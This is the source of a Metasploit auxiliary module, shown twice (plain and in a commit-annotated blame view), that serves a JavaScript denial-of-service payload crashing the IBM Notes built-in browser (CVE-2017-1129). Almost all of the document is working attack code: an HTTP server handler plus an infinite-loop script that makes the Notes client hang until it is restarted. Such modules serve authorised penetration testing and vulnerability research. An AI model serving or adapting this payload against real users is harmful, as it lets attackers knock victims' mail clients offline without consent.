metasploit-framework/modules/auxiliary/dos/http/ibm_lotus_notes.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "IBM Notes encodeURI DOS",
        'Description'    => %q(
          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
          If successful,it could cause the Notes client to hang and have to be restarted.
        ),
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Dhiraj Mishra',
        ],
        'References'     => [
          [ 'EXPLOIT-DB', '42602'],
          [ 'CVE', '2017-1129' ]
        ],
        'DisclosureDate' => 'Aug 31 2017',
        'Actions'        => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction'  => 'WebServer'
      )
    )
  end

  def run
    exploit # start http server
  end

  def setup
    @html = %|
    <html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
                var object = { };
                function d(d0) {
                        var d0 = (object instanceof encodeURI)('foo');
                }
                d(75);
        } catch (d) { }
</script>
</head></html>
    |
  end

  def on_request_uri(cli, _request)
    print_status('Sending response')
    send_response(cli, @html)
  end
end
Update ibm_lotus_notes.rb 2017-09-22 11:46:42 +00:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`
Create ibm_lotus_notes.rb 2017-09-22 11:38:05 +00:00
Update ibm_lotus_notes.rb 2017-09-22 11:46:42 +00:00			`class MetasploitModule < Msf::Auxiliary`
			`include Msf::Exploit::Remote::HttpServer`

			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => "IBM Notes encodeURI DOS",`
			`'Description' => %q(`
			`This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.`
			`If successful,it could cause the Notes client to hang and have to be restarted.`
			`),`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'Dhiraj Mishra',`
			`],`
			`'References' => [`
Create ibm_lotus_notes.rb 2017-09-22 11:38:05 +00:00			`[ 'EXPLOIT-DB', '42602'],`
			`[ 'CVE', '2017-1129' ]`
			`],`
Update and rename modules/auxiliary/dos/ibm_lotus_notes.rb to modules/auxiliary/dos/http/ibm_lotus_notes.rb 2017-09-23 12:57:50 +00:00			`'DisclosureDate' => 'Aug 31 2017',`
Create ibm_lotus_notes.rb 2017-09-22 11:38:05 +00:00			`'Actions' => [[ 'WebServer' ]],`
			`'PassiveActions' => [ 'WebServer' ],`
			`'DefaultAction' => 'WebServer'`
			`)`
			`)`
			`end`

			`def run`
			`exploit # start http server`
			`end`

			`def setup`
			`@html = %\|`
			`<html><head><title>DOS</title>`
			`<script type="text/javascript">`
			`while (true) try {`
			`var object = { };`
			`function d(d0) {`
			`var d0 = (object instanceof encodeURI)('foo');`
			`}`
			`d(75);`
			`} catch (d) { }`
			`</script>`
			`</head></html>`
			`\|`
			`end`

			`def on_request_uri(cli, _request)`
			`print_status('Sending response')`
			`send_response(cli, @html)`
			`end`
			`end`